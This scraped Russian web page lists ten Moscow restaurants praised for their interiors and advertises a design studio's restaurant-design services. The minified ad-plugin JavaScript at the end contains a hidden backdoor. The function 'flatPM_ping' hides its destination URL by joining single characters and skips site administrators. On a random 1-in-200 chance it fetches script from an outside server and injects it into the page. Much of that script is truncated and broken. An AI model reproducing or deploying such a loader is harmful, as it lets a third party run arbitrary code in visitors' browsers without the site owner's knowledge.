9 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Интерьер ресторанов москвы

Топ-10 самых красивых ресторанов Москвы по интерьеру

Современный человек настолько избалован, что угодить ему непросто. Это касается всех сфер деятельности, общепит – не исключение. Люди, которые хотят открыть свое дело, должны уделять внимание не только меню и качественным продуктам, но и дизайну. Тем более, если речь идет о ресторане. Посетители приходят туда не столько поесть, сколько отдохнуть, насладиться общением и, конечно же, красивым интерьером. Если же он будет необычным, ресторан может обойтись без рекламы, о нем, итак, будут говорить все вокруг.

Представляем вам самые красивые рестораны Москвы по интерьеру, которые подходят для недорогого романтического ужина, свадьбы – топ-10 кафе с симпатичной верандой. Возможно, после прочтения статьи вам захочется посетить какой-то из них и получить настоящее эстетическое удовольствие.

10. Brasserie Мост

Довольно популярное и модное место. Интерьер создан на основе парижских брассери. Это небольшие уютные кафе, предназначенные для спокойного отдыха.

Ресторан расположен в историческом здании, его стиль – австрийский модерн. Первый зал – основной, просторный с панорамными окнами и множеством зеркал. Стены украшены лепниной.

Настоящая гордость «Brasserie Мост» — это антикварные люстры. Мебель выполнена в том же стиле: венские стулья, столы, покрытые белоснежными скатертями.

Второй зал – каминный, стиль ар-деко (один из самых изысканных в начале ХХ века). В отделке используются натуральные материалы: дерево, бархат, кожа. Неповторимую парижскую атмосферу создает камин со свечами.

9. Zayceff

Небольшой элегантный ресторан, который расположен в самом центре столицы. Интерьер можно охарактеризовать одним словом «респектабельность». Спокойные тона, природные оттенки, натуральные материалы. Это итальянская классика.

Каждый посетитель этого заведения получает уникальную возможность забыть о суете и бешеном ритме большого города. Массивная мебель, хрустальные люстры… Большую роль здесь играют детали. Зеркальные панно, скульптуры, открытый бар с витражами, мягкие ковры. Они создают атмосферу торжественности.

Выше уже было отмечено, что ресторан «Zayceff» небольшой по размерам. Вместительность – 52 человека, есть еще караоке-зал (30 человек).

8. Казбек

Ресоран «Казбек» открылся в 2016 году. Это проект популярного в России ресторатора Андрея Деллоса. По его признанию, это не что иное, как попытка воссоздать юношеские воспоминания о счастливом времени, проведенном в Грузии.

Ресторан рассчитан на 112 посетителей. Его называют «атмосферной грузинской квартирой». Он привлекает внимание жителей и гостей столицы своим колоритом и особым шармом. Располагается в старинном здании, бывшая «Трехгорная мануфактура». Дневной свет, искусственно состаренные стены и пол, дровяная печь.

В «Казбеке» есть разные варианты посадочных мест: столики на разное количество персон, закрытый кабинет, веранда, открытый зал для небольшой компании. Это идеальное место для тех, кто хочет ощутить настоящую грузинскую атмосферу.

7. Ruski

Ресторан считается самым высоким в Европе, его месторасположение — 85 этаж небоскреба «Око». Гости ресторана смогут насладиться русской кухней (авторское переосмысление), есть и интернациональные блюда, хотя обстановка «Ruski» заставит забыть о еде.

Авангардная роскошь. Используются только натуральные материалы, спокойные естественные оттенки. Разумеется, панорамные окна, чтобы гости ресторана могли любоваться прекрасными видами Москвы.

В «Ruski» 4 зоны, каждая из них олицетворяет определенную стихию. В центре зала расположена настоящая русская печь, ее длина – 8 метров.

6. Лодка

Любителям азиатской кухни обязательно понравится в ресторане «Лодка». Его основатель известный российский боксер Константин Цзю. Он признается, что сам очень любит азиатскую кухню, но в Москве не было такого места, в котором можно было попробовать блюда китайской, корейской и японской кухонь одновременно. Хотя теперь есть – ресторан «Лодка».

Его название говорит само за себя, интерьер выполнен в морском стиле. Внутренняя обстановка напоминает дорогую яхту. Иллюминаторы, кожаная мебель, мерцающий полумрак. В отделке использованы изумрудные оттенки, пол выложен из узких палубных досок. В этом заведении каждый сможет почувствовать себя покорителем морей.

5. Турандот

Еще один проект ресторатора Андрея Деллоса. Место расположения – старинный особняк XVIII века. На его реставрацию ушло 6 лет! Впрочем, результат получился ошеломительным, по роскоши и богатству ресторан превосходит царские дворцы.

Внутреннее убранство «Турандота» описать непросто. Там множество разнообразных залов. В каждом своя идея и свой интерьер. Преобладает стиль «барокко». Основные характеристики – роскошь, вычурность. Этот ресторан считается одним из самых величественных и достойных заведений Москвы.

4. White Rabbit

Этот ресторан регулярно входит в топы самых известных не только в России, но и во всем мире. Расположен в историческом центре столицы, на 16 этаже Смоленского пассажа.

Создателям «White Rabbit» есть чем гордиться. Это не только изумительные блюда русской кухни и красивый интерьер, но и самый лучший панорамный вид на исторический центр Москвы. Название заведения переводится как «Белый кролик».

Планировка двухуровневая, оба зала оформлены в стиле «Алисы в стране чудес». «White Rabbit» поможет окунуться в волшебный сказочный мир. Эту атмосферу удается воссоздать во многом благодаря деталям: камин, украшенный декоративной лепниной, викторианский стиль мебели, необычная барная стойка.

3. Ladurеe

«Ladurеe» — это кондитерский бренд класса люкс. Его история началась в 1862 году. На данный момент он представлен в 28 странах мира. Ресторан легендарной французской кондитерской появился и в Москве. Благодаря его расположению (вблизи Красной площади) здесь нет отбоя от посетителей.

В московском «Ladurеe» соблюдены все стандарты по оформлению интерьера. Заведение ничем не отличается от подобных, расположенных в других городах и странах. Здесь царит романтичная атмосфера: пастельные оттенки, много розового, ангелочки, натуральные материалы, изящная мебель и люстры.

2. Plov project

Яркий и стильный ресторан предлагает своим гостям попробовать блюда различных кухонь мира. Располагается в центре столицы.

«Plov project» поражает своим масштабами. Это два этажа, около тысячи квадратных метров. Ресторан рассчитан на 200 персон. Не стоит пугаться, здесь не возникает «ощущение толпы», пространство заведения делится на множество укромных уголков с помощью живой зелени и импровизированных золотых клеток.

Этот ресторан напоминает сказочный сад. Летом открывается большая веранда, это 100 дополнительных посадочных мест. Хотите побывать в сказке? Обязательно посетите «Plov project».

1. Balzi rossi

Роскошное заведение, расположенное в самом центре столицы, в высотке на Баррикадной. Здание построено в 50-х годах ХХ века, здесь когда-то располагался легендарный советский гастроном. Дизайнерам и строителям понадобился целый год, чтобы воплотить задуманную идею.

Величественные колонны, старинные люстры, лепные потолки удивительным образом сочетаются с современной мебелью, статуями, живыми цветами, сложной системой подсветки.

Интерьер ресторана “Balzi rossi” поражает своей роскошью, слишком вычурный даже по московским меркам. Это вызывающе дорогое заведение обещает своим посетителям, что они смогут погрузиться в атмосферу Лазурного берега.

Это кусочек Европы внутри Москвы, есть одно «но». Персонал – иностранцы, ни один официант не разговаривает по-русски. Меню на русском языке отсутствует. Хорошо это или плохо, каждый решает сам, но большинство посетителей не хотят возвращаться в этот фешенебельный ресторан.

Интерьер ресторанов москвы

Дизайн ресторана от «А» до «Я». Фото и 3D визуализации проектов. Интерьеры ресторанов Москвы с уникальным оформлением ресторанного пространства. Дизайнерский взгляд на красоту, уют и практичность. Дизайн-проекты того как грамотно и красиво оформить ресторан в том или ином стиле интерьера. Прованс/кантри, арт деко/ар-деко и современный стиль. Примеры того что дизайнеры московской студии AR-Design могут предложить на предмет того чтобы ваш ресторан вызывал только положительные эмоции. Интерьеры, на примере которых вы можете заказать дизайн в Москве в студии АРТ РЕАЛ ДИЗАЙН .

Ресторан – место, в котором многие любители вкусной еды и встреч на нейтральной территории проводят массу времени своей жизни. О том насколько важен дизайн ресторанов в мегаполисе подавляющее большинство рестораторов Москвы знают не понаслышке.

Ни для кого не является секретом то, что в ресторане клиент платит не только за еду, но и за атмосферу, в которой происходит встреча и/или трапеза. В таком месте важно всё начиная от того как готовят еду и заканчивая тем как и где её подают. В большинстве случаев ещё до того как у клиента появляется возможность оценить гастрономические изыски меню, его внутреннее «Я» начинает впитывать и «переваривать» окружающий интерьер. Вследствие чего положительные эмоции гостя являются лучшим показателем не только качества дизайна, но и перспективы его повторного визита!

Более 70% тех, кто постоянно посещает рестораны в Москве, считают, что дизайн наравне с качеством пищи является фундаментальным критерием оценки таких заведений.

Задаваясь вопросом: «Что в ресторане играет наиболее важную роль – дизайн или кухня?» – не стоит ожидать однозначно-объективного ответа. Одни считают, что это диаметрально-противоположные аспекты бизнеса, другие настаивают на том, что всё дело в степени гармонии вещей. Какую точку зрения стоит поддерживать Вам – дело хозяйское! Зачастую процесс погружения в эту тему в той или иной мере заставляет многих заинтересованных лиц неоднократно склоняться в ту или иную сторону. Мнений много, но бесспорно одно. Среди тысяч оттенков и вариантов дизайна ресторатору и дизайнеру необходимо найти ту золотую середину, которая позволит вашему ресторану обрести свою уникальность.

Чтобы финальный аккорд посещения вашего ресторана оставлял в душах людей только хорошие воспоминания постарайтесь не омрачать ваш брэнд ни дизайном, ни гастрономией. Как говориться: «Встречают по одёжке, а провожают по уму!».

С каждым днём борьба за клиента при помощи эстетики и практичности растёт как на дрожжах. Всё чаще и чаще фантазия дизайнеров интерьера предлагает гостям рес-нов Москвы оценить великолепие того что называется уникальным ди-ном. Потрясающая энергетика креатива, невероятные сочетания стилей и грамотные планировки ежедневно погружают в гармонию окружающего тысячи любителей ресторанной трапезы.

Многое из того что сегодня предлагают толковые дизайнеры помогает рестораторам мегаполисов воплотить свою мечту в реальность. Но прежде чем стать успешным владельцем ресторанного бизнеса в мегаполисе каждому ресторатору необходимо найти правильные ответы на многие непростые вопросы.

Несомненно, что по мере поиска истины у каждого ресторатора будет возникать необходимость в получении ответов на следующие фундаментальные вопросы. Правда ли что дизайн интерьера самая стабильная часть вложения в ресторан, то есть ресторанный бизнес? Какую роль играет грамотная ассоциация позиций меню с интерьером? Почему одни дизайн вызывает восхищение большинства, а другой совершенно противоположную реакцию? Как в своём ресторане создать атмосферу, которая не только привлечёт внимание клиента, но и поспособствует тому, чтобы человек стал постоянным клиентом? Какой интерьер ресторана будет вызывать у посетителей наибольший аппетит? Как грамотно выбрать стиль, который будет приятен не только ресторатору, но и многим гостям? В каком ди-не, возможно, найти ту золотую середину, которая сделает ресторан в Москве наиболее успешной структурой такого рода бизнеса?

Эти вопросы, связанные с ин-ром рес-нов лишь малая часть вопросов на которые придётся искать ответы каждому кто намерен создать уникально-успешный ди-йн. Пожалуй, это именно те вопросы, на которые нет однозначного ответа, то есть: «На вкус и цвет – товарищей нет!». Задавая себе и другим эти и подобные вопросы необходимо понимать следующее.

Грамотный дизайн ресторана это не десерт, а некая субстанция, которая в меру своей консистенции в той или иной мере способствует усвоению предложенной клиенту пищи. Так или иначе, но разобраться в тонкостях дизайна вам готовы помочь в студии АРД.

Атмосфера окружающего не только важна, она просто необходима в роли катализатора успеха. Цвет, свет и запах это те сигналы, которые всегда и, безусловно, привлекают внимание человека к происходящему вокруг. Приятные цвета и световые решения, грамотный план помещения и выбор предметов интерьера – основа успеха в дизайне любого ресторана! Уделив интерьеру должное внимание вы, несомненно, получите всё то, о чём мечтает каждый ресторатор.

Дизайн ресторана и кафе

От вас поступает звонок
или заявка с сайта

Встречаемся у нас в офисе или выезжаем на объект. Собираем информацию и уточняем детали

Готовим коммерческое предложение со сроками, ценами и составом работ

Обмеры помещения и составление технического задания

Создание планировочного задания. Далее — 3д визуализация

Разработка рабочих чертежей и ведомости отделочных материалов

Реализация. Строительство, авторский надзор и комплектация материалами

Получаем
реализованный
проект!

  • Изучение особенностей проектируемого объекта и согласование технического задания
  • Обмеры помещений и фотографирование объекта. Либо на основе чертежей, предоставленных заказчиком
  • Выполнение обмерного чертежа с привязкой инженерных коммуникаций
  • Предоставление планов с вариантами расстановки мебели и сантехнического оборудования
  • План пола с указанием типа покрытия
  • План потолка с указанием типа покрытия
  • Цветная 3D визуализация интерьеров — для выбранных помещений (количество помещений определяется на этапе согласования договора)
  • Подготовка исполнительной документации по выполненным работам
  • План демонтажа перегородок и инженерных коммуникаций
  • План возводимых перегородок с маркировкой оконных и дверных проемов
  • План помещения после перепланировки с указанием размеров. Строительный план.
  • План пола с указанием: отметок уровня пола, типа напольного покрытия, его рисунка и размеров. Разрез конструкции пола с указанием слоев покрытия. (Количество чертежей зависит от уровня сложности задания)
  • План потолка с указанием типа используемого материала, отдельных узлов и сечений. (Количество чертежей зависит от уровня сложности задания)
  • План размещения осветительных приборов, привязка выпусков освещения, план размещения выключателей с указанием включения групп светильников
  • План размещения электрических розеток и электровыводов с привязками
  • План отделки с указанием типа покрытия, без артикула и производителя.
  • Ведомость отделочных материалов (с указанием типа покрытия, без площади и артикула).
  • Количество выездов в магазины, салоны для согласования отделочных материалов: 4
  • Авторский надзор в течение2 -х месяцев — в подарок (6 выездов на объект)
  • Цветная 3D визуализация интерьеров — для всех помещений
  • Бюджетирование. Составление финальной сметы на все отделочные чистовые материалы, мебель и прочее.
  • Развертка стен с раскладкой плитки и указанием размеров, артикула и площади выбранного материала
  • Разработка ключевой зоны в двух стилевых решениях.
  • Чертежи узлов крепления архитектурных элементов (выполняется в случае необходимости), в т. ч. перегородок, перилл и пр. конструкций
  • Разрез и развертка стен с декоративными элементами. (Количество чертежей зависит от числа декоративных элементов)
  • План плинтусов
  • Ведомость отделочных материалов (с указанием типа покрытия, площади, производителя, продовца и артикула)
  • Спецификация дверей с указанием размеров дверных проемов
  • Спецификация окон, световых проемов
  • Спецификация перегородок
  • Спецификация мебели
  • Спецификация освещения
  • Спецификации заказных, нестандартных изделий и других предметов интерьера
  • Количество выездов в магазины, салоны для согласования отделочных материалов: 8
  • Авторский надзор в течение 4-х месяцев — в подарок (12 выездов на объект)

Стоимость дизайн-проекта интерьера ресторана, кафе или бара рассчитывается исходя из ставки за квадратный метр и количества квадратных метров пола вашего помещения. Для вашего удобства мы сделали несколько пакетов услуг, которые отличаются
друг от друга объемом оказываемых услуг.

Дизайн ресторанов и кафе | Дизайн проект ресторана

Первое, что бросается в глаза посетителю гурману или просто проголодавшемуся – это интерьер ресторана и кафе. Меню, качество кухни, уровень сервиса представится возможность оценить немного позже. А вот дизайн ресторана и кафе должен привлечь посетителя в первую очередь, чтобы он не развернулся к выходу, так и не дойдя до свободного столика. Уютную атмосферу, спокойную, способствующую релаксации, обстановку сполна не могут заменить даже самые внимательные официанты и вкусные блюда.

Дизайн интерьера ресторана в Москве предполагает разделение помещения на несколько зон: большой зал, где можно устраивать банкеты, небольшие vip-залы и зал, в котором каждый столик может быть декоративно огражден в отдельную зону. Именно такие требования позволяют создать ощущение уюта как у посетителя vip-зала, так и простого посетителя, который, например, пришел пообедать.

Дизайн кафе в классическом стиле «Палермо»

Дизайн ресторана «Роскошная жизнь»

Москва, 1-й Коптельский переулок. Варианты проекта интерьера.

Банкетный зал ресторана в классическом стиле

В проекте использовано оформление потолков и стен росписью – фресками.
Подробности дизайн проекта банкетного зала в классическом стиле >>

Дизайн кафе на берегу моря в Грузии

Грузия, кафе с видом на море расположено на территории гостиницы.
Варианты проекта фасада кафе и его интерьера.
Подробности дизайн проекта открытого кафе 160 кв. м >>

Ресторан «Чайхана Бухара»

Любой дизайн проект интерьера начинается с выбора концепции ресторана, а также определения целевой аудитории по различным критериям, например, социальному кругу, демографическому признаку и т.д. На основе этих данных разрабатывается стиль интерьера, его цветовая гамма, дизайн мебели и оборудования, подбирается освещение, аудиосистема и другие элементы, которыми должен обладать каждый ресторан.

Интерьер ресторанов и кафе в Москве, конечно же, подразумевает наличие технических помещений, планы которых являются частью проекта ресторана. Дизайн кафе может подразумевать сопряжение кухни с цехом заготовок, цехом предварительной подготовки, а также помещениями для хранения продуктов. Для персонала необходимо предусмотреть душевые, помещения для отдыха, раздевалки. Отдельные кабинеты администрации также включаются в дизайн проект интерьера кафе и ресторанов.

Разработка грамотного дизайна, а также его реализация могут привлечь в ваше заведение дополнительных посетителей. Мы разрабатываем дизайн ресторанов в Москве в разных стилях, с различными финансовыми возможностями заведения, применяем современные безопасные материалы! Даже если ваш бюджет ограничен, мы справимся с этой задачей!

Декорирование ресторана «Каравайцефф»

Дизайн интерьера ресторана «Колизей»

Дизайн интерьера ресторана «Маркиза Ангелов-1»

Дизайн проект фасада и интерьера ресторана «Старый город» в Москве

Включает проект реконструкции фасада ресторана, разработку ночного освещения фасада ресторана, проектирование дизайна летнего кафе, ландшафтный дизайн, дизайн-проект банкетного зала ресторана на 200 кв.м.
Подробности дизайн проекта фасада ресторана и летнего кафе >>

Проектирование дизайна территории перед рестораном с летним кафе

Реконструкция кафе быстрого питания, г. Москва

Кафе «Шоколадница» в Тбилиси

Банкетный зал 150 кв.м в частном доме в Сочи

Зал предназначен для приема гостей, проведения праздников, банкетов.

Дизайн интерьера кафе «Аксун»

Дизайн ресторана «Миоко»

Выезд архитектора-дизайнера с консультацией и осмотром объекта – 3000 руб. При заключении договора стоимость вычитается из общей суммы договора.
Стоимость дизайн проекта ресторана, кафе, бара на странице «Цены» >>

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика